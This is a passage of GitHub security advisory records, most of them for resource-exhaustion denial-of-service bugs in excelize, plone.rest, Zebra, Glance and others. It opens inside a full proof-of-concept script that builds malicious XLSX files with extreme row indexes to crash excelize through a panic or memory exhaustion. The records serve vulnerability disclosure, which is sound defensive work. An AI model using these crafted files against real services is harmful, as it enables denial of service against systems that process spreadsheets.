os.path.dirname(os.path.abspath(__file__))\nPARENT_DIR = os.path.dirname(BASE_DIR) # Docker build context\nRESULT_FILE = os.path.join(BASE_DIR, \"phase2_result.json\")\nDOCKERFILE = os.path.join(BASE_DIR, \"Dockerfile\")\nIMAGE_NAME = \"excelize-poc-vuln001\"\n\nEXPLOIT_SRC = os.path.join(BASE_DIR, \"exploit_main.go\")\nPANIC_XLSX = os.path.join(BASE_DIR, \"row_negative.xlsx\")\nOOM_XLSX = os.path.join(BASE_DIR, \"row_maxint.xlsx\")\n\n\n# ---------------------------------------------------------------------------\n# Step 1 \u2014 Write the Go exploit source\n# ---------------------------------------------------------------------------\nEXPLOIT_GO = textwrap.dedent(\"\"\"\\\n // exploit_main.go \u2014 PoC for VULN-001\n // Triggers excelize checkSheet() unbounded allocation via malicious XLSX.\n package main\n\n import (\n \\t\"fmt\"\n \\t\"os\"\n \\t\"runtime/debug\"\n\n \\texcelize \"github.com/xuri/excelize/v2\"\n )\n\n func main() {\n \\tif len(os.Args) \u003c 2 {\n \\t\\tfmt.Fprintln(os.Stderr, \"Usage: poc \u003cxlsx_file\u003e\")\n \\t\\tos.Exit(1)\n \\t}\n \\tpath := os.Args[1]\n \\tfmt.Printf(\"[*] Opening: %s\\\\n\", path)\n\n \\t// Wrap the call so we can print a structured panic message before exiting.\n \\t// The panic itself is the evidence of exploitability.\n \\tfunc() {\n \\t\\tdefer func() {\n \\t\\t\\tif r := recover(); r != nil {\n \\t\\t\\t\\tfmt.Println(\"[VULN] PANIC CAUGHT \u2014 vulnerability confirmed\")\n \\t\\t\\t\\tfmt.Printf(\"[VULN] panic value: %v\\\\n\", r)\n \\t\\t\\t\\tfmt.Println(\"[VULN] Stack trace:\")\n \\t\\t\\t\\tdebug.PrintStack()\n \\t\\t\\t\\tos.Exit(2) // exit 2 = exploitable crash (panic)\n \\t\\t\\t}\n \\t\\t}()\n\n \\t\\tf, err := excelize.OpenFile(path)\n \\t\\tif err != nil {\n \\t\\t\\tfmt.Printf(\"[!] OpenFile error: %v\\\\n\", err)\n \\t\\t\\tos.Exit(1)\n \\t\\t}\n \\t\\tdefer f.Close()\n\n \\t\\t// GetCellValue \u2192 getCellStringFunc \u2192 workSheetReader \u2192 checkSheet()\n \\t\\t// checkSheet() is the sink: make([]xlsxRow, row) where row is attacker-controlled.\n \\t\\tfmt.Println(\"[*] Calling GetCellValue \u2014 entering checkSheet() sink\")\n \\t\\tval, err := f.GetCellValue(\"Sheet1\", \"A1\")\n \\t\\tif err != nil {\n \\t\\t\\t// Some errors surface instead of panicking (e.g. allocation failures\n \\t\\t\\t// that Go converts to errors in some configurations).\n \\t\\t\\tfmt.Printf(\"[!] GetCellValue error: %v\\\\n\", err)\n \\t\\t\\tos.Exit(3) // exit 3 = error path (still abnormal)\n \\t\\t}\n \\t\\tfmt.Printf(\"[*] GetCellValue returned normally, value=%q (no crash)\\\\n\", val)\n \\t}()\n }\n\"\"\")\n\n\ndef write_exploit_source() -\u003e None:\n with open(EXPLOIT_SRC, \"w\") as fh:\n fh.write(EXPLOIT_GO)\n print(f\"[+] Wrote exploit source: {EXPLOIT_SRC}\")\n\n\n# ---------------------------------------------------------------------------\n# Step 2 \u2014 Build malicious XLSX files\n# ---------------------------------------------------------------------------\nCONTENT_TYPES = (\n \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u0027\n \u0027\u003cTypes xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"\u003e\u0027\n \u0027\u003cDefault Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/\u003e\u0027\n \u0027\u003cDefault Extension=\"xml\" ContentType=\"application/xml\"/\u003e\u0027\n \u0027\u003cOverride PartName=\"/xl/workbook.xml\"\u0027\n \u0027 ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/\u003e\u0027\n \u0027\u003cOverride PartName=\"/xl/worksheets/sheet1.xml\"\u0027\n \u0027 ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/\u003e\u0027\n \u0027\u003c/Types\u003e\u0027\n)\n\nRELS = (\n \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u0027\n \u0027\u003cRelationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"\u003e\u0027\n \u0027\u003cRelationship Id=\"rId1\"\u0027\n \u0027 Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\"\u0027\n \u0027 Target=\"xl/workbook.xml\"/\u003e\u0027\n \u0027\u003c/Relationships\u003e\u0027\n)\n\nWORKBOOK = (\n \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u0027\n \u0027\u003cworkbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"\u0027\n \u0027 xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"\u003e\u0027\n \u0027\u003csheets\u003e\u003csheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/\u003e\u003c/sheets\u003e\u0027\n \u0027\u003c/workbook\u003e\u0027\n)\n\nWORKBOOK_RELS = (\n \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u0027\n \u0027\u003cRelationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"\u003e\u0027\n \u0027\u003cRelationship Id=\"rId1\"\u0027\n \u0027 Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\"\u0027\n \u0027 Target=\"worksheets/sheet1.xml\"/\u003e\u0027\n \u0027\u003c/Relationships\u003e\u0027\n)\n\n\ndef sheet_xml(row_r: str) -\u003e str:\n return (\n \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u0027\n \u0027\u003cworksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"\u003e\u0027\n f\u0027\u003csheetData\u003e\u003crow r=\"{row_r}\"\u003e\u003cc r=\"A1\"\u003e\u003cv\u003e1\u003c/v\u003e\u003c/c\u003e\u003c/row\u003e\u003c/sheetData\u003e\u0027\n \u0027\u003c/worksheet\u003e\u0027\n )\n\n\ndef build_xlsx(path: str, row_r: str) -\u003e None:\n with zipfile.ZipFile(path, \"w\", zipfile.ZIP_DEFLATED) as z:\n z.writestr(\"[Content_Types].xml\", CONTENT_TYPES)\n z.writestr(\"_rels/.rels\", RELS)\n z.writestr(\"xl/workbook.xml\", WORKBOOK)\n z.writestr(\"xl/_rels/workbook.xml.rels\", WORKBOOK_RELS)\n z.writestr(\"xl/worksheets/sheet1.xml\", sheet_xml(row_r))\n print(f\"[+] Created {os.path.basename(path)} (row r={row_r!r})\")\n\n\n# ---------------------------------------------------------------------------\n# Step 3 \u2014 Docker helpers\n# ---------------------------------------------------------------------------\ndef run_cmd(cmd: list, timeout: int = 600) -\u003e subprocess.CompletedProcess:\n print(f\"[\u003e] {\u0027 \u0027.join(str(x) for x in cmd)}\")\n return subprocess.run(\n cmd,\n capture_output=True,\n text=True,\n timeout=timeout,\n )\n\n\ndef docker_build() -\u003e tuple[bool, str]:\n result = run_cmd(\n [\n \"docker\", \"build\",\n \"--no-cache\",\n \"-f\", DOCKERFILE,\n \"-t\", IMAGE_NAME,\n PARENT_DIR,\n ],\n timeout=600,\n )\n combined = result.stdout + result.stderr\n if result.returncode != 0:\n print(f\"[-] docker build FAILED (rc={result.returncode})\")\n print(combined[-4000:])\n return False, combined\n print(\"[+] Docker image built successfully\")\n return True, combined\n\n\ndef docker_run_variant(label: str, xlsx_path: str, mem: str = \"256m\", timeout: int = 90) -\u003e dict:\n \"\"\"Run the exploit container against one XLSX file and return analysis dict.\"\"\"\n cmd = [\n \"docker\", \"run\", \"--rm\",\n \"--memory\", mem,\n \"--memory-swap\", mem,\n \"-v\", f\"{xlsx_path}:/input.xlsx:ro\",\n IMAGE_NAME,\n \"/input.xlsx\",\n ]\n run_cmd_str = \" \".join(cmd)\n try:\n result = run_cmd(cmd, timeout=timeout)\n rc = result.returncode\n stdout = result.stdout or \"\"\n stderr = result.stderr or \"\"\n except subprocess.TimeoutExpired:\n rc = -99\n stdout = \"\"\n stderr = f\"TIMEOUT after {timeout}s\"\n\n combined = stdout + stderr\n print(f\"\\n--- {label} ---\")\n print(f\" exit code : {rc}\")\n print(f\" stdout : {stdout[:1200]}\")\n print(f\" stderr : {stderr[:1200]}\")\n\n is_panic = any(kw in combined for kw in (\n \"index out of range\",\n \"PANIC CAUGHT\",\n \"runtime error\",\n \"goroutine \",\n \"panic:\",\n ))\n is_oom = any(kw in combined for kw in (\n \"out of memory\",\n \"cannot allocate\",\n \"fatal error\",\n \"makeslice\",\n )) or rc == 137\n\n # exit 2 = panic caught; exit 137 = OOM kill; exit 3 = error path\n crashed = rc != 0 and (is_panic or is_oom or rc in (2, 3, 137))\n\n return {\n \"label\": label,\n \"rc\": rc,\n \"is_panic\": is_panic,\n \"is_oom\": is_oom,\n \"crashed\": crashed,\n \"run_cmd\": run_cmd_str,\n \"snippet\": combined[:1500].strip(),\n }\n\n\n# ---------------------------------------------------------------------------\n# Main\n# ---------------------------------------------------------------------------\ndef main() -\u003e None:\n print(\"=\" * 65)\n print(\"VULN-001 PoC \u2014 excelize checkSheet() unbounded allocation DoS\")\n print(\"=\" * 65)\n\n # 1. Write Go exploit source (needed before docker build)\n write_exploit_source()\n\n # 2. Create malicious XLSX payloads\n build_xlsx(PANIC_XLSX, \"-1\") # Variant B: index OOB panic\n build_xlsx(OOM_XLSX, \"2147483647\") # Variant A: 2 GB+ make() \u2192 OOM\n\n # 3. Build Docker image\n build_cmd = (\n f\"docker build --no-cache -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}\"\n )\n build_ok, build_out = docker_build()\n if not build_ok:\n payload = {\n \"passed\": False,\n \"verdict\": \"FAIL\",\n \"reason\": (\n \"Docker \uc774\ubbf8\uc9c0 \ube4c\ub4dc\uc5d0 \uc2e4\ud328\ud588\uc2b5\ub2c8\ub2e4. golang:latest \uc774\ubbf8\uc9c0\uac00 go.mod\uc758 \"\n \"\u0027go 1.25.0\u0027 \uc694\uac74\uc744 \ucda9\uc871\ud558\uc9c0 \uc54a\uc744 \uc218 \uc788\uc2b5\ub2c8\ub2e4. Dockerfile\uc5d0\uc11c \"\n \"\u0027golang:1.25\u0027 \ub4f1 \uba85\uc2dc\uc801 \ubc84\uc804 \ud0dc\uadf8\ub85c \uad50\uccb4 \ud6c4 \uc7ac\uc2dc\ub3c4 \ubc14\ub78d\ub2c8\ub2e4.\"\n ),\n \"build_command\": build_cmd,\n \"run_command\": \"\",\n \"poc_command\": f\"python3 {os.path.abspath(__file__)}\",\n \"evidence\": build_out[-2000:],\n \"artifacts\": [\"Dockerfile\", \"poc.py\"],\n }\n with open(RESULT_FILE, \"w\") as fh:\n json.dump(payload, fh, indent=2, ensure_ascii=False)\n print(f\"\\n[!] FAIL result \u2192 {RESULT_FILE}\")\n sys.exit(1)\n\n # 4. Run both variants\n ev_panic = docker_run_variant(\n \"Variant B \u2014 r=-1 (index out of range panic)\", PANIC_XLSX, mem=\"256m\")\n ev_oom = docker_run_variant(\n \"Variant A \u2014 r=2147483647 (OOM)\", OOM_XLSX, mem=\"256m\")\n\n # 5. Verdict\n passed = ev_panic[\"crashed\"] or ev_oom[\"crashed\"]\n\n if ev_panic[\"crashed\"]:\n primary, primary_ev = \"B (r=-1, panic)\", ev_panic\n elif ev_oom[\"crashed\"]:\n primary, primary_ev = \"A (r=2147483647, OOM)\", ev_oom\n else:\n primary, primary_ev = \"B (r=-1, panic)\", ev_panic # best-effort\n\n if passed:\n reason = (\n f\"\uc2e4\ud589 \uacb0\uacfc \ube44\uc815\uc0c1 \uc885\ub8cc \ud655\uc778\ub428 (\uc8fc\uc694 variant: {primary}). \"\n f\"Variant B(r=-1): rc={ev_panic[\u0027rc\u0027]}, panic={ev_panic[\u0027is_panic\u0027]}; \"\n f\"Variant A(r=2147483647): rc={ev_oom[\u0027rc\u0027]}, oom={ev_oom[\u0027is_oom\u0027]}. \"\n \"excelize.go:377 make([]xlsxRow, row)\uc5d0 \ub300\ud55c bounds \uac80\uc99d \ubd80\uc7ac\uac00 \"\n \"\ucee8\ud14c\uc774\ub108 \ub0b4 \uc2e4\uc81c DoS(\ud328\ub2c9/OOM)\ub97c \uc720\ubc1c\ud568\uc744 \uc2e4\ud589\uc73c\ub85c \uc99d\uba85.\"\n )\n verdict = \"PASS\"\n else:\n reason = (\n \"\ucee8\ud14c\uc774\ub108 \uc2e4\ud589\uc774 \uc644\ub8cc\ub418\uc5c8\uc73c\ub098 \ucda9\ub3cc(\ud328\ub2c9/OOM) \uc99d\uac70\uac00 \uad00\uce21\ub418\uc9c0 \uc54a\uc74c. \"\n f\"Variant B rc={ev_panic[\u0027rc\u0027]}, Variant A rc={ev_oom[\u0027rc\u0027]}. \"\n \"\uac00\ub2a5\ud55c \uc6d0\uc778: (1) Go \ub7f0\ud0c0\uc784\uc774 make() \uc2e4\ud328\ub97c panic \ub300\uc2e0 error\ub85c \ubc18\ud658, \"\n \"(2) \uba54\ubaa8\ub9ac \ud55c\ub3c4 \ucd08\uacfc \uc804 OOM killer\uac00 \uc791\ub3d9\ud558\uc9c0 \uc54a\uc74c. \"\n \"\ub2e4\uc74c\uc744 \uc2dc\ub3c4: --memory 64m\uc73c\ub85c \uc7ac\uc2e4\ud589, \ub610\ub294 \ud638\uc2a4\ud2b8\uc5d0\uc11c \uc9c1\uc811 Go \ube4c\ub4dc \ud6c4 \uc2e4\ud589.\"\n )\n verdict = \"FAIL\"\n\n phase2 = {\n \"passed\": passed,\n \"verdict\": verdict,\n \"reason\": reason,\n \"build_command\": build_cmd,\n \"run_command\": primary_ev[\"run_cmd\"],\n \"poc_command\": f\"python3 {os.path.abspath(__file__)}\",\n \"evidence\": primary_ev[\"snippet\"],\n \"artifacts\": [\"Dockerfile\", \"poc.py\"],\n }\n\n with open(RESULT_FILE, \"w\") as fh:\n json.dump(phase2, fh, indent=2, ensure_ascii=False)\n\n print(f\"\\n{\u0027=\u0027*65}\")\n print(f\"Verdict : {verdict} (passed={passed})\")\n print(f\"Result \u2192 {RESULT_FILE}\")\n print(\"=\" * 65)\n\n\nif __name__ == \"__main__\":\n main()\n```",
"id": "GHSA-h69g-9hx6-f3v4",
"modified": "2026-07-10T19:25:20Z",
"published": "2026-07-10T19:25:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/qax-os/excelize/security/advisories/GHSA-h69g-9hx6-f3v4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54063"
},
{
"type": "PACKAGE",
"url": "https://github.com/qax-os/excelize"
},
{
"type": "WEB",
"url": "https://github.com/qax-os/excelize/releases/tag/v2.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Excelize: Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS)"
}
GHSA-H6M2-5C7M-X9F8
Vulnerability from github – Published: 2025-06-24 12:30 – Updated: 2025-06-26 21:31A denial-of-service vulnerability due to improper prioritization of network traffic over protection mechanism exists in Relion 670/650 and SAM600-IO series device that if exploited could potentially cause critical functions like LDCM (Line Distance Communication Module) to malfunction.
{
"affected": [],
"aliases": [
"CVE-2025-2403"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-24T12:15:20Z",
"severity": "HIGH"
},
"details": "A denial-of-service vulnerability due to improper prioritization of network traffic over protection mechanism exists in Relion 670/650 and SAM600-IO series device that if exploited could potentially cause critical functions like LDCM (Line Distance Communication Module) to malfunction.",
"id": "GHSA-h6m2-5c7m-x9f8",
"modified": "2025-06-26T21:31:05Z",
"published": "2025-06-24T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2403"
},
{
"type": "WEB",
"url": "https://publisher.hitachienergy.com/preview?DocumentID=8DBD000216\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H6P4-HC6J-X474
Vulnerability from github – Published: 2022-08-04 00:00 – Updated: 2022-08-11 00:00TripleCross v0.1.0 was discovered to contain a stack overflow which occurs because there is no limit to the length of program parameters.
{
"affected": [],
"aliases": [
"CVE-2022-35506"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-03T21:15:00Z",
"severity": "HIGH"
},
"details": "TripleCross v0.1.0 was discovered to contain a stack overflow which occurs because there is no limit to the length of program parameters.",
"id": "GHSA-h6p4-hc6j-x474",
"modified": "2022-08-11T00:00:36Z",
"published": "2022-08-04T00:00:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35506"
},
{
"type": "WEB",
"url": "https://github.com/h3xduck/TripleCross/issues/40"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H6QX-C9G7-659W
Vulnerability from github – Published: 2025-01-06 12:30 – Updated: 2025-01-06 12:30Uncontrolled resource consumption when a driver, an application or a SMMU client tries to access the global registers through SMMU.
{
"affected": [],
"aliases": [
"CVE-2024-43064"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-06T11:15:09Z",
"severity": "HIGH"
},
"details": "Uncontrolled resource consumption when a driver, an application or a SMMU client tries to access the global registers through SMMU.",
"id": "GHSA-h6qx-c9g7-659w",
"modified": "2025-01-06T12:30:33Z",
"published": "2025-01-06T12:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43064"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2025-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H6RP-MPRM-XGCQ
Vulnerability from github – Published: 2023-09-21 17:06 – Updated: 2025-02-13 19:13Impact
When the ++api++ traverser is accidentally used multiple times in a url, handling it takes increasingly longer, making the server less responsive.
Patches
Patches will be released in plone.rest 2.0.1 and 3.0.1. Series 1.x is not affected.
Workarounds
In your frontend web server (nginx, Apache) you can redirect /++api++/++api++ to /++api++.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "plone.rest"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0a1"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "plone.rest"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.0.0"
]
}
],
"aliases": [
"CVE-2023-42457"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2023-09-21T17:06:37Z",
"nvd_published_at": "2023-09-21T15:15:10Z",
"severity": "MODERATE"
},
"details": "### Impact\nWhen the `++api++` traverser is accidentally used multiple times in a url, handling it takes increasingly longer, making the server less responsive.\n\n### Patches\nPatches will be released in `plone.rest` 2.0.1 and 3.0.1. Series 1.x is not affected.\n\n### Workarounds\nIn your frontend web server (nginx, Apache) you can redirect `/++api++/++api++` to `/++api++`.",
"id": "GHSA-h6rp-mprm-xgcq",
"modified": "2025-02-13T19:13:09Z",
"published": "2023-09-21T17:06:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/plone/plone.rest/security/advisories/GHSA-h6rp-mprm-xgcq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42457"
},
{
"type": "WEB",
"url": "https://github.com/plone/plone.rest/commit/43b4a7e86206e237e1de5ca3817ed071575882f7"
},
{
"type": "WEB",
"url": "https://github.com/plone/plone.rest/commit/77846a9842889b24f35e8bedc2e9d461388d3302"
},
{
"type": "PACKAGE",
"url": "https://github.com/plone/plone.rest"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/plone-rest/PYSEC-2023-178.yaml"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/09/22/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "plone.rest vulnerable to Denial of Service when ++api++ is used many times"
}
GHSA-H6XW-MGHQ-7523
Vulnerability from github – Published: 2022-04-08 00:00 – Updated: 2022-04-15 16:14SWHKD 1.1.5 allows unsafe parsing via the -c option. An information leak might occur but there is a simple denial of service (memory exhaustion) upon an attempt to parse a large or infinite file (such as a block or character device).
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "Simple-Wayland-HotKey-Daemon"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-27819"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-08T22:12:17Z",
"nvd_published_at": "2022-04-07T02:15:00Z",
"severity": "MODERATE"
},
"details": "SWHKD 1.1.5 allows unsafe parsing via the -c option. An information leak might occur but there is a simple denial of service (memory exhaustion) upon an attempt to parse a large or infinite file (such as a block or character device).",
"id": "GHSA-h6xw-mghq-7523",
"modified": "2022-04-15T16:14:51Z",
"published": "2022-04-08T00:00:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27819"
},
{
"type": "WEB",
"url": "https://github.com/waycrate/swhkd/commit/b4e6dc76f4845ab03104187a42ac6d1bbc1e0021"
},
{
"type": "PACKAGE",
"url": "https://github.com/waycrate/swhkd"
},
{
"type": "WEB",
"url": "https://github.com/waycrate/swhkd/releases"
},
{
"type": "WEB",
"url": "https://github.com/waycrate/swhkd/releases/tag/1.2.0"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/04/14/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Unsafe parsing in SWHKD"
}
GHSA-H72H-PPCX-998P
Vulnerability from github – Published: 2026-07-02 19:42 – Updated: 2026-07-02 19:42Am I affected
You are affected if:
- You run
zebradup to and includingv4.4.1. - Your node accepts inbound P2P connections (
network.listen_addris set, which is the default).
Summary
The P2P codec's Codec::decode() method calls src.reserve(body_len + HEADER_LEN) after parsing a 24-byte protocol header, using the attacker-claimed body_len field. This reserves up to MAX_PROTOCOL_MESSAGE_LEN (~2 MiB) of virtual buffer capacity per connection before any body bytes arrive and before the handshake completes.
However, BytesMut::reserve() sets virtual capacity without committing physical memory pages. The operating system does not allocate physical RAM until bytes are actually written into the buffer. Since the attacker never sends body bytes, the reserved capacity remains uncommitted. Reproduction of the reporter's PoC (256 threads, 30 seconds of sustained connections) showed negligible RSS impact on the Zebra process.
Zebra's existing mitigations further constrain the practical attack surface: per-IP connection limits (max_connections_per_ip = 1), a per-connection accept rate of approximately one per second, and a 3-second handshake timeout that cleans up idle connections.
Details
At zebra-network/src/protocol/external/codec.rs:406, after parsing the 24-byte header and validating the network magic and body length against MAX_PROTOCOL_MESSAGE_LEN, the codec calls src.reserve(body_len + HEADER_LEN). The codec is constructed on the bare TCP stream before negotiate_version() runs, so the reservation is reachable from any TCP peer that can send 24 bytes.
No legitimate Zcash handshake message (version, verack) is anywhere close to 2 MiB. The codec makes no distinction between pre-handshake and post-handshake message types when sizing the reservation.
Patches
The fix defers large buffer reservations until after the handshake completes, or caps the per-message reservation for pre-handshake messages to what version/verack actually require.
Workarounds
No workaround is needed. The existing per-IP rate limiting, handshake timeout, and connection limits effectively mitigate the practical impact.
Impact
Minimal. The reservation affects virtual address space only, not physical memory. Zebra's existing connection-management mitigations (per-IP limits, accept rate, handshake timeout) further constrain the attack. The code path is worth cleaning up for defense-in-depth but does not produce a measurable denial-of-service effect.
Credit
Reported by @ouicate via a private GitHub Security Advisory submission.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.0.0"
},
"package": {
"ecosystem": "crates.io",
"name": "zebra-network"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.4.1"
},
"package": {
"ecosystem": "crates.io",
"name": "zebrad"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T19:42:05Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "### Am I affected\n\nYou are affected if:\n\n1. You run `zebrad` up to and including `v4.4.1`.\n2. Your node accepts inbound P2P connections (`network.listen_addr` is set, which is the default).\n\n### Summary\n\nThe P2P codec\u0027s `Codec::decode()` method calls `src.reserve(body_len + HEADER_LEN)` after parsing a 24-byte protocol header, using the attacker-claimed `body_len` field. This reserves up to `MAX_PROTOCOL_MESSAGE_LEN` (~2 MiB) of virtual buffer capacity per connection before any body bytes arrive and before the handshake completes.\n\nHowever, `BytesMut::reserve()` sets virtual capacity without committing physical memory pages. The operating system does not allocate physical RAM until bytes are actually written into the buffer. Since the attacker never sends body bytes, the reserved capacity remains uncommitted. Reproduction of the reporter\u0027s PoC (256 threads, 30 seconds of sustained connections) showed negligible RSS impact on the Zebra process.\n\nZebra\u0027s existing mitigations further constrain the practical attack surface: per-IP connection limits (`max_connections_per_ip = 1`), a per-connection accept rate of approximately one per second, and a 3-second handshake timeout that cleans up idle connections.\n\n### Details\n\nAt `zebra-network/src/protocol/external/codec.rs:406`, after parsing the 24-byte header and validating the network magic and body length against `MAX_PROTOCOL_MESSAGE_LEN`, the codec calls `src.reserve(body_len + HEADER_LEN)`. The codec is constructed on the bare TCP stream before `negotiate_version()` runs, so the reservation is reachable from any TCP peer that can send 24 bytes.\n\nNo legitimate Zcash handshake message (`version`, `verack`) is anywhere close to 2 MiB. The codec makes no distinction between pre-handshake and post-handshake message types when sizing the reservation.\n\n### Patches\n\nThe fix defers large buffer reservations until after the handshake completes, or caps the per-message reservation for pre-handshake messages to what `version`/`verack` actually require.\n\n### Workarounds\n\nNo workaround is needed. The existing per-IP rate limiting, handshake timeout, and connection limits effectively mitigate the practical impact.\n\n### Impact\n\nMinimal. The reservation affects virtual address space only, not physical memory. Zebra\u0027s existing connection-management mitigations (per-IP limits, accept rate, handshake timeout) further constrain the attack. The code path is worth cleaning up for defense-in-depth but does not produce a measurable denial-of-service effect.\n\n### Credit\n\nReported by `@ouicate` via a private GitHub Security Advisory submission.",
"id": "GHSA-h72h-ppcx-998p",
"modified": "2026-07-02T19:42:05Z",
"published": "2026-07-02T19:42:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-h72h-ppcx-998p"
},
{
"type": "PACKAGE",
"url": "https://github.com/ZcashFoundation/zebra"
},
{
"type": "WEB",
"url": "https://github.com/ZcashFoundation/zebra/blob/d4cd662c716382f6397d2a730148025a1ca79fec/zebra-network/src/peer/handshake.rs#L917-L934"
},
{
"type": "WEB",
"url": "https://github.com/ZcashFoundation/zebra/blob/d4cd662c716382f6397d2a730148025a1ca79fec/zebra-network/src/protocol/external/codec.rs#L359-L416"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Zebra has pre-handshake buffer capacity reservation based on attacker-claimed body length"
}
GHSA-H737-Q6G6-8WR6
Vulnerability from github – Published: 2022-05-17 03:10 – Updated: 2024-11-26 18:25OpenStack Image Registry and Delivery Service (Glance) 2014.2 through 2014.2.2 does not properly remove images, which allows remote authenticated users to cause a denial of service (disk consumption) by creating a large number of images using the task v2 API and then deleting them before the uploads finish, a different vulnerability than CVE-2015-1881.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glance"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.0.0a0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
